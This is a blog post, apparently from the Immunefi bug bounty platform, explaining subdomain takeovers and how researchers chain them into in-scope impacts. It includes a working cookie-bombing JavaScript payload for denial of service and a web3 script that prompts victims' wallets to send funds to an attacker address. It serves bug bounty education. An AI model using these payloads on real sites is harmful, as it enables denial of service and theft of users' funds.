At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking them as Not Applicable, unless they’re supplemented with more information on how this vulnerability can be used to impact the core application.

This article is about what subdomain takeovers are and how they can be used to impact the core application of a project. Showing how the core application can be impacted is required to receive a bug bounty payout on Immunefi for this attack vector.

What Is a Subdomain Takeover?

The procedure of registering a non-existent domain name in order to obtain control of another domain is known as subdomain takeover.

Let’s take a look at an example of takeover.immunefi.com

• takeover.immunefi.com has a CNAME that points to another domain, e.g., not-immunefi.eth
• Not-immunefi.eth expires for some reason is able to be registered by anyone
• Anyone who now owns not-immunefi.eth has full authority over takeover.immunefi.com, as the CNAME record has not been deleted from the DNS zone which now points to the attacker-controlled CNAME

MDN Web Docs has a wonderful description of the subdomain takeover problem, which is available here for further reading. In short, it gives an attacker the ability to host malicious content, distribute exploits, and so on.

Immunefi rejects the majority of these submissions because we apply strict triaging and only accept a list of specific impacts that are listed in each bug bounty program’s policy.

A few commonly accepted impacts for web applications are: DOS, initiating fake transactions, loss of user funds, and spoofing other users.

We encourage everyone to read our program policies carefully and try to chain OOS (out of scope) bugs to impact in-scope assets and keep accepted impacts in mind.

Assuming you have complete access to the vulnerable subdomain, the following are a few fantastic reports that we want to share with our web hacking community on how some of the Immunefi researchers chained OOS submissions and earned bounties.

Cookie Bombing Leading to DOS

Cookie bombing is a common attack vector that you can demonstrate. The aim behind this attack is to send several cookies to users, preventing them from using the web application until they manually erase their cookies.

var base_domain = “.example.finance”;
var pollution = Array(4000).join(‘a’); for(var i=1;i<99;i++) {document.cookie=’bomb’+i+’=’+pollution+’;Domain=’+base_domain+’;Path=/’; }

Hosting the above malicious code will create hundreds of cookies for the web application which would lead to DOS because most servers have a length limit on the headers. When this threshold is exceeded, the server returns 413 or 431 errors. This would financially impact the projects, as the victim would not be able to interact with the application. Cookie bombing which leads to DoS qualifies as the low severity impact temporarily disabling user access to target site.

Initiating Malicious Transactions

One area of concern for projects with bug bounties on Immunefi is the ability to initiate/sign transactions. These issues are considered to be of critical severity.

Let’s assume you have the ability to host Javascript files. So, how can we initiate a malicious transaction?

ethereum
.request({ method: ‘eth_requestAccounts’ })
.then(getAccount)
.catch((err) => {
console.error(err);
});
function getAccount(accounts) {
const account = accounts[0];
send(account)
}function send(account) {
ethereum
.request({
method: ‘eth_sendTransaction’,
params: [
{
from: account,
to: ATTACKER_WALLET_ADDRESS,
value: ‘0x29a2241af62c0000’,
gasPrice: ‘0x09184e72a000’,
gas: ‘0x2710’,
},
],
})
.then((txHash) => console.log(txHash))
.catch((error) => console.error);}

The above PoC tries to connect to the blockchain via Web3 and a crypto wallet such as MetaMask on the victim’s browser to process the transaction to an attacker-owned address.

The impact of this is that the transactions are being requested from a reputable project, so people would not hesitate to sign the transaction.

If you follow this guidance, you’ll be one step closer to claiming big bug bounties. But remember, if you submit a subdomain takeover bug that does not have an impact on an in-scope asset, it will be marked as Not Applicable.

If you’re a Web2 or Web3 developer who is finally thinking about a bug-hunting career in Web3, we got you. Check out our ultimate blockchain hacking guide, and start taking home some of the $84m in rewards available on Immunefi — the leading bug bounty platform for Web3.